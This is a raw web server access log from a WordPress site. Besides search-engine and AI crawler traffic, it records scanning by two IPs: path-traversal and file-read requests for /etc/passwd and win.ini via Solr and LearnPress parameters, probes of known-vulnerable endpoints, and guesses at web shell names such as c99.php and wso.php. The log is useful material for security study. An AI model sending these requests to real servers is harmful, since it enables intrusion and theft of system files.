157.20.32.210 - - [18/Oct/2025:11:47:43 -0400] "GET /wp-admin/users.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:47:46 -0400] "GET /products239699444?kg=0236776363 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
105.74.12.34 - - [18/Oct/2025:11:47:45 -0400] "GET /skipper.php HTTP/1.1" 404 10896 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
157.20.32.210 - - [18/Oct/2025:11:48:08 -0400] "GET /wp-content/uploads/cfom_files/34eybxkfxvtf33lybv2youtuidw.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:11:48:10 -0400] "GET /products173267276?kg=0171154343 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:48:49 -0400] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:48:50 -0400] "GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15"
20.171.207.254 - - [18/Oct/2025:11:48:26 -0400] "GET /products60911030?kg=0060168294 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
105.74.12.34 - - [18/Oct/2025:11:48:07 -0400] "GET /skippershell.php HTTP/1.1" 200 0 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
157.20.32.210 - - [18/Oct/2025:11:49:13 -0400] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://c:/windows/win.ini HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:11:49:23 -0400] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://c:/windows/win.ini HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1"
216.73.216.159 - - [18/Oct/2025:11:49:33 -0400] "GET /products167551580?kg=0165508351 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:49:44 -0400] "GET /admin/login/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:50:00 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.1"
20.171.207.254 - - [18/Oct/2025:11:49:31 -0400] "GET /products60904634?kg=0060161976 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:49:55 -0400] "GET /admin/login/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
66.249.64.106 - - [18/Oct/2025:11:50:57 -0400] "GET /?products13422252?kg=0013258647 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
105.74.12.34 - - [18/Oct/2025:11:50:08 -0400] "GET /tshop.php HTTP/1.1" 200 0 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
157.20.32.210 - - [18/Oct/2025:11:51:16 -0400] "POST /SamlResponseServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:51:40 -0400] "POST /SamlResponseServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:51:47 -0400] "POST /aspera/faspex/package_relay/relay_package HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
20.171.207.254 - - [18/Oct/2025:11:51:34 -0400] "GET /products60871274?kg=0060129024 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:52:08 -0400] "POST / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
105.74.12.34 - - [18/Oct/2025:11:51:09 -0400] "GET /alfa.php HTTP/1.1" 200 0 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
157.20.32.210 - - [18/Oct/2025:11:52:13 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 6.2; rv:140.0.) Gecko/20100101 Firefox/140.0."
185.61.153.107 - - [18/Oct/2025:11:48:21 -0400] "POST /wp-cron.php?doing_wp_cron=1760802500.6690990924835205078125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:11:48:41 -0400] "GET /products173196264?kg=0171084197 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:48:49 -0400] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://c:/windows/win.ini HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:11:49:00 -0400] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://c:/windows/win.ini HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:11:50:03 -0400] "GET /cgi-bin/ExportLogs.sh HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.19"
105.74.12.34 - - [18/Oct/2025:11:49:08 -0400] "GET /tttt.php HTTP/1.1" 200 0 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
157.20.32.210 - - [18/Oct/2025:11:50:08 -0400] "GET /admin/login/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:50:25 -0400] "GET /products100464482?kg=0099239388 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.106 - - [18/Oct/2025:11:50:52 -0400] "GET /categories/12330788 HTTP/1.1" 200 28750 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
20.171.207.254 - - [18/Oct/2025:11:50:32 -0400] "GET /products60885488?kg=0060143065 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:51:16 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.2"
157.20.32.210 - - [18/Oct/2025:11:51:28 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:51:23 -0400] "POST /aspera/faspex/package_relay/relay_package HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
157.20.32.210 - - [18/Oct/2025:11:51:27 -0400] "POST /SamlResponseServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:51:34 -0400] "POST /aspera/faspex/package_relay/relay_package HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
157.20.32.210 - - [18/Oct/2025:11:52:13 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:11:52:09 -0400] "GET /products175176190?kg=0173039978 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:11:52:28 -0400] "POST /classes/Login.php?f=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0"
157.20.32.210 - - [18/Oct/2025:11:52:43 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:11:52:52 -0400] "POST /classes/Login.php?f=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0"
157.20.32.210 - - [18/Oct/2025:11:53:00 -0400] "GET /admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:53:11 -0400] "GET /admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
188.166.52.190 - - [18/Oct/2025:11:52:16 -0400] "POST /xmlrpc.php HTTP/1.1" 503 854 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.20 (KHTML, like Gecko) Version/10.1 Safari/603.1.20"
157.20.32.210 - - [18/Oct/2025:11:53:24 -0400] "GET /admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:11:53:42 -0400] "GET /products60891186?kg=0060148692 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
105.74.12.34 - - [18/Oct/2025:11:54:05 -0400] "GET /saudi.php HTTP/1.1" 503 854 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
66.249.64.106 - - [18/Oct/2025:11:54:51 -0400] "GET /?products121713046?kg=0120228822 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.106 - - [18/Oct/2025:11:54:45 -0400] "GET /products567066?kg=0000560232 HTTP/1.1" 200 28962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.107 - - [18/Oct/2025:11:55:06 -0400] "GET /categories/11211938 HTTP/1.1" 200 29017 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:11:55:15 -0400] "POST /banker/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:11:55:24 -0400] "GET /categories/1128732 HTTP/1.1" 200 29735 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
105.74.12.34 - - [18/Oct/2025:11:54:45 -0400] "GET /wso.php HTTP/1.1" 503 854 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
66.249.64.106 - - [18/Oct/2025:11:55:25 -0400] "GET /categories/11365314 HTTP/1.1" 200 29144 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:11:55:38 -0400] "GET /categories/11193442 HTTP/1.1" 200 29213 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:11:52:39 -0400] "POST /classes/Login.php?f=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0"
20.171.207.254 - - [18/Oct/2025:11:52:39 -0400] "GET /products60877488?kg=0060135161 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
105.74.12.34 - - [18/Oct/2025:11:52:10 -0400] "GET /shell.php HTTP/1.1" 200 0 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
105.74.12.34 - - [18/Oct/2025:11:53:10 -0400] "GET /inje3ctor.php HTTP/1.1" 503 854 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.166.52.190 - - [18/Oct/2025:11:53:27 -0400] "POST /xmlrpc.php HTTP/1.1" 503 854 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.20 (KHTML, like Gecko) Version/10.1 Safari/603.1.20"
157.20.32.210 - - [18/Oct/2025:11:54:50 -0400] "GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:54:51 -0400] "POST /banker/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:11:55:02 -0400] "POST /banker/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:11:54:45 -0400] "GET /products60907846?kg=0060165150 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
105.74.12.34 - - [18/Oct/2025:11:55:29 -0400] "GET /alfashell.php HTTP/1.1" 503 854 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
20.171.207.254 - - [18/Oct/2025:11:55:48 -0400] "GET /products60900302?kg=0060157698 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
43.153.135.208 - - [18/Oct/2025:11:56:19 -0400] "GET / HTTP/1.1" 200 1404 "http://salhab360photos.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
206.189.247.132 - - [18/Oct/2025:11:56:30 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
157.20.32.210 - - [18/Oct/2025:11:56:46 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:11:56:50 -0400] "GET /products60911946?kg=0060169200 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.254 - - [18/Oct/2025:11:57:50 -0400] "GET /products60914516?kg=0060171739 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:11:59:05 -0400] "POST /wp-cron.php?doing_wp_cron=1760803145.4695041179656982421875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
185.61.153.107 - - [18/Oct/2025:11:59:06 -0400] "POST /wp-cron.php?doing_wp_cron=1760803145.8699290752410888671875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
105.74.12.34 - - [18/Oct/2025:11:58:17 -0400] "GET /up.php HTTP/1.1" 404 10904 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
185.61.153.107 - - [18/Oct/2025:11:59:11 -0400] "POST /wp-cron.php?doing_wp_cron=1760803150.9680609703063964843750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
188.166.52.190 - - [18/Oct/2025:11:54:32 -0400] "POST /xmlrpc.php HTTP/1.1" 503 854 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.20 (KHTML, like Gecko) Version/10.1 Safari/603.1.20"
157.20.32.210 - - [18/Oct/2025:11:55:54 -0400] "POST /goanywhere/lic/accept HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_0_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/19.0 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:11:56:05 -0400] "POST /goanywhere/lic/accept HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_0_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/19.0 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:11:56:18 -0400] "POST /goanywhere/lic/accept HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_0_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/19.0 Safari/605.1.15"
18.130.255.219 - - [18/Oct/2025:11:56:30 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
66.249.64.106 - - [18/Oct/2025:11:56:25 -0400] "GET /products111868696?kg=0110504525 HTTP/1.1" 200 29370 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
98.70.29.56 - - [18/Oct/2025:11:56:12 -0400] "POST /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
188.166.52.190 - - [18/Oct/2025:11:56:05 -0400] "POST /xmlrpc.php HTTP/1.1" 503 854 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.20 (KHTML, like Gecko) Version/10.1 Safari/603.1.20"
157.20.32.210 - - [18/Oct/2025:11:56:57 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
66.249.64.107 - - [18/Oct/2025:11:57:15 -0400] "GET /?products4579696?kg=0004523929 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:11:57:10 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
105.74.12.34 - - [18/Oct/2025:11:56:16 -0400] "GET /my_alfa.php HTTP/1.1" 200 0 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
105.74.12.34 - - [18/Oct/2025:11:57:16 -0400] "GET /uploader.php HTTP/1.1" 200 0 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
216.73.216.159 - - [18/Oct/2025:11:58:52 -0400] "GET /robots.txt HTTP/1.1" 200 84 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:11:58:52 -0400] "GET /products156935950?kg=0155022178 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:11:59:10 -0400] "POST /wp-cron.php?doing_wp_cron=1760803150.1673829555511474609375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:11:58:56 -0400] "GET /products60932720?kg=0060189721 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:11:59:19 -0400] "GET /accounts/login/ HTTP/1.1" 404 10896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
105.74.12.34 - - [18/Oct/2025:11:59:23 -0400] "GET /priv8.php HTTP/1.1" 404 10899 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
105.74.12.34 - - [18/Oct/2025:11:59:10 -0400] "GET /hacked.php HTTP/1.1" 404 10903 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
157.20.32.210 - - [18/Oct/2025:11:59:14 -0400] "POST /jeecg-boot/jmreport/qurestSql HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_0_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/19.0 Safari/605.1.15"
105.74.12.34 - - [18/Oct/2025:11:59:17 -0400] "GET /c99.php HTTP/1.1" 404 10900 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
105.74.12.34 - - [18/Oct/2025:11:59:27 -0400] "GET /Navir.php HTTP/1.1" 404 10897 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
105.74.12.34 - - [18/Oct/2025:11:59:32 -0400] "GET /inc20k1.php HTTP/1.1" 404 10904 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
157.20.32.210 - - [18/Oct/2025:11:59:39 -0400] "GET /flash/addcrypted2 HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-en) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
157.20.32.210 - - [18/Oct/2025:11:59:45 -0400] "POST /flash/addcrypted2 HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/19.0 Safari/605.1.15"
105.74.12.34 - - [18/Oct/2025:11:59:45 -0400] "GET /1index.php HTTP/1.1" 404 10897 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
105.74.12.34 - - [18/Oct/2025:11:59:48 -0400] "GET /404.php HTTP/1.1" 404 10905 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
105.74.12.34 - - [18/Oct/2025:11:59:54 -0400] "GET /wp.php HTTP/1.1" 404 10903 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
20.171.207.254 - - [18/Oct/2025:11:59:57 -0400] "GET /products60904110?kg=0060161458 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
206.189.247.132 - - [18/Oct/2025:12:00:09 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
152.42.157.60 - - [18/Oct/2025:12:00:10 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:12:00:11 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0"
105.74.12.34 - - [18/Oct/2025:12:00:31 -0400] "GET /leafmailer.php HTTP/1.1" 404 10904 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
